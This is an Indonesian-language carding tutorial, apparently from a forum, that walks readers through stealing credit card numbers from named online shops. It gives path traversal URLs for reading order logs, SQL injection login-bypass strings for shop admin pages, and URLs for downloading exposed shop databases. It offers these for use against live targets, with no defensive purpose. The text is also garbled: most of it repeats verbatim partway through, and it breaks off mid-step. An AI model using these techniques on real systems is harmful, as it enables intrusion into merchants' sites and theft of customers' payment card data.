STEP BY STEP CARDING
Nih.. saya berbagi sedikit ilmu kepada bro sekalian... selamat mencoba.
CGI Store Log
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.cashwells.com/cgi-bin/sto...ir_Manuals.htm
2. Kemudian hapus/delete Repair_Manuals.htm di url/browsing sehingga menjadi http://www.cashwells.com/cgi-bin/store/index.cgi?page=
3. Masukkan file ini di belakang situs tadi :
../admin/files/order.log
Misal nya http://www.cashwells.com/cgi-bin/sto...iles/order.log
4. Maka yang keluar di situs itu adalah nomor CC (credit card).
Admin Take Over
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.partsupply.in.th/shopadmin.asp
2. Langkah selanjutnya gunakan teknik SQL Injection
user : 1‘or”1='
pass : ‘or”=’
3. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh……. CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. Tapi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. Coba cari lagi target lain.
Database Downloadable
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.youngsliquors.com/winestore/shopadmin.asp
2. Kemudian hapus/delete shopadmin.asp di url/browsing sehingga menjadi http://www.youngsliquors.com/winestore/
3. Masukkan file ini di belakang situs tadi :
shopdbtest.asp
Misal nya http://www.youngsliquors.com/winestore/shopdbtest.asp
4. Trus lihat apa nama databasenya dan letaknya pada : xDatabase dan xDblocation
contoh :
xDatabase : shopping300
xDatabase :../../../../www/youngsliquors/5498761211
5. Skrg utk mendownload file shopping300 dapat dilakukan dgn merubah url/browsing nya menjadi :
http://www.youngsliquors.com/winestore/shopping300.mdb
6. Kalo sudah di download, buka file shopping300.mdb dgn Microsoft Access.
Metacart
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.imagexpres.com/metacart/moreinfo.asp
2. Kemudian hapus/delete moreinfo.asp di url/browsing sehingga menjadi http://www.imagexpres.com/metacart/
3. Masukkan file ini di belakang situs tadi :
database/metacart.mdb
Misal nya http://www.imagexpres.com/metacart/d...e/metacart.mdb
6. Kalo sudah di download, buka file metacart.mdb dgn Microsoft Access.
PDshopPro Shopping Cart
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.marktwainbooks.com/shop/category.asp?catid=4
2. Kemudian hapus/delete shop/category.asp?catid=4 di url/browsing sehingga menjadi http://www.marktwainbooks.com
3. Masukkan file ini di belakang situs tadi :
admin/dbsetup.asp
Misal nya http://www.marktwainbooks.com/admin/dbsetup.asp
4. Maka yang keluar di situs target adalah :
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.cashwells.com/cgi-bin/sto...ir_Manuals.htm
2. Kemudian hapus/delete Repair_Manuals.htm di url/browsing sehingga menjadi http://www.cashwells.com/cgi-bin/store/index.cgi?page=
3. Masukkan file ini di belakang situs tadi :
../admin/files/order.log
Misal nya http://www.cashwells.com/cgi-bin/sto...iles/order.log
4. Maka yang keluar di situs itu adalah nomor CC (credit card).
Admin Take Over
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.partsupply.in.th/shopadmin.asp
2. Langkah selanjutnya gunakan teknik SQL Injection
user : 1‘or”1='
pass : ‘or”=’
3. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh……. CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. Tapi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. Coba cari lagi target lain.
Database Downloadable
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.youngsliquors.com/winestore/shopadmin.asp
2. Kemudian hapus/delete shopadmin.asp di url/browsing sehingga menjadi http://www.youngsliquors.com/winestore/
3. Masukkan file ini di belakang situs tadi :
shopdbtest.asp
Misal nya http://www.youngsliquors.com/winestore/shopdbtest.asp
4. Trus lihat apa nama databasenya dan letaknya pada : xDatabase dan xDblocation
contoh :
xDatabase : shopping300
xDatabase :../../../../www/youngsliquors/5498761211
5. Skrg utk mendownload file shopping300 dapat dilakukan dgn merubah url/browsing nya menjadi :
http://www.youngsliquors.com/winestore/shopping300.mdb
6. Kalo sudah di download, buka file shopping300.mdb dgn Microsoft Access.
Metacart
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.imagexpres.com/metacart/moreinfo.asp
2. Kemudian hapus/delete moreinfo.asp di url/browsing sehingga menjadi http://www.imagexpres.com/metacart/
3. Masukkan file ini di belakang situs tadi :
database/metacart.mdb
Misal nya http://www.imagexpres.com/metacart/d...e/metacart.mdb
6. Kalo sudah di download, buka file metacart.mdb dgn Microsoft Access.
PDshopPro Shopping Cart
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.marktwainbooks.com/shop/category.asp?catid=4
2. Kemudian hapus/delete shop/category.asp?catid=4 di url/browsing sehingga menjadi http://www.marktwainbooks.com
3. Masukkan file ini di belakang situs tadi :
admin/dbsetup.asp
Misal nya http://www.marktwainbooks.com/admin/dbsetup.asp
4. Maka yang keluar di situs target adalah :
